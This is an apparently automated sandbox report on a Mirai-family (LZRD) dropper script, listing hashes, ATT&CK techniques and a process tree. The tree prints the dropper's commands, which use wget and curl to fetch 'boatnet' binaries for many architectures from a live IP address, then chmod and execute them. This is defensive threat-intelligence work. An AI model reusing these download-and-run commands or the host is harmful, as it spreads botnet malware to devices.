Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-12-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
e0ccd217979419469e913cbef10872f3
-
SHA1
6bbef022dcf450af81bee90522e4c82069c84064
-
SHA256
288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
-
SHA512
38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 715 chmod 740 chmod 781 chmod 834 chmod 705 chmod 692 chmod 764 chmod 828 chmod 846 chmod 678 chmod 728 chmod 752 chmod 797 chmod 840 chmod 699 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 679 WTF /tmp/WTF 693 WTF /tmp/WTF 700 WTF /tmp/WTF 706 WTF /tmp/WTF 716 WTF /tmp/WTF 729 WTF /tmp/WTF 742 WTF /tmp/WTF 754 WTF /tmp/WTF 767 WTF /tmp/WTF 783 WTF /tmp/WTF 799 WTF /tmp/WTF 829 WTF /tmp/WTF 835 WTF /tmp/WTF 841 WTF /tmp/WTF 847 WTF -
resource yara_rule behavioral2/files/fstream-2.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 681 wget 686 curl 691 cat -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.sh4 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:655 -
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵PID:657
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:666
-
-
/bin/catcat boatnet.x862⤵PID:675
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:679
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
PID:681
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:686
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:691
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:693
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵PID:695
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:697
-
-
/bin/catcat boatnet.arc2⤵PID:698
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:700
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵PID:702
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:703
-
-
/bin/catcat boatnet.i4682⤵PID:704
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:706
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵PID:708
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:709
-
-
/bin/catcat boatnet.i6862⤵PID:713
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:716
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵PID:719
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:722
-
-
/bin/catcat boatnet.x86_642⤵PID:726
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵PID:732
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:735
-
-
/bin/catcat boatnet.mpsl2⤵PID:739
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵PID:744
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
PID:747
-
-
/bin/catcat boatnet.arm2⤵PID:751
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:754
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵PID:756
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:759
-
-
/bin/catcat boatnet.arm52⤵PID:763
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:767
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵PID:770
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:773
-
-
/bin/catcat boatnet.arm62⤵PID:780
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:783
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵PID:786
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:791
-
-
/bin/catcat boatnet.arm72⤵PID:795
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵PID:801
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/catcat boatnet.ppc2⤵PID:827
-
-
/bin/chmodchmod +x boatnet.ppc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:831
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/catcat boatnet.spc2⤵PID:833
-
-
/bin/chmodchmod +x boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:835
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:837
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/catcat boatnet.m68k2⤵PID:839
-
-
/bin/chmodchmod +x boatnet.m68k boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:841
-
-
/usr/bin/wgetwget http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:843
-
-
/usr/bin/curlcurl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/catcat boatnet.sh42⤵PID:845
-
-
/bin/chmodchmod +x boatnet.m68k boatnet.ppc boatnet.sh4 boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:847
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD51e162c39d85d8f08728210db19798879
SHA18d2ee60a26c1c38de42037feeefdc628118d70b5
SHA256d6952ca2b659cb009ca7d0de6246b8ae8e0a86423522b7f1316bfdfd91e06c70
SHA51285b3ae42f8523f1928e76c9cf64b673914e149750104d814def5e59f9c076d96840b523b9d573b9335bd28f9b4b900c6e1298dbd68382154601eba13463bd13d
-
Filesize
57KB
MD576f2df5e034fbe227f5cd851376d3d1f
SHA1d3cfcb394d6669d6b7e5956b9f9cd4de149a3cef
SHA2560c011c0cc1645385ba4e67bedd8ea7348b7a9c632d974e0ba0bf9943bb1fa61f
SHA512f81e8c3ac094d35329aa3089ed4eac6f2418ff7da92403ca10d0f2b67e665c183db9b8544ead4894f9bb5581721ce4df03e112ef1c6606bfec2e0fd3a7562bf8
-
Filesize
53KB
MD5aa19cffc3b569300ba677ffc4cb70ab9
SHA136039da7c231eb0a6eb299ed88e4f058e8bb5165
SHA25653044334e5ee28766499aade3d9ea8bf57c82f739ddb3331afa3e2299364e77d
SHA5120504b00ccb95463cb75140c0d33067392f659c54d69ff0e18c3bcb5841d9090dc315165649469334ebbb74ab27922395d410fd5b1bb890ecbefb93ad4a1b18b0
-
Filesize
48KB
MD59910604ba5bdd7b651f13f828e78c318
SHA154e183f34ca44f8eb521b657cfcf4855cdf5eac1
SHA25693cd701ed36fc3247e226d183e474e1760004df0261109e8ad74d87a181781a1
SHA512428793ecf340f54ca87573fd8260c82f03539952e003c1ae96b858e3eaa6a7362b2e74a7f03baa042d199641097566a0cb2aca4a3bdd4d4e6e4a28eec97e1009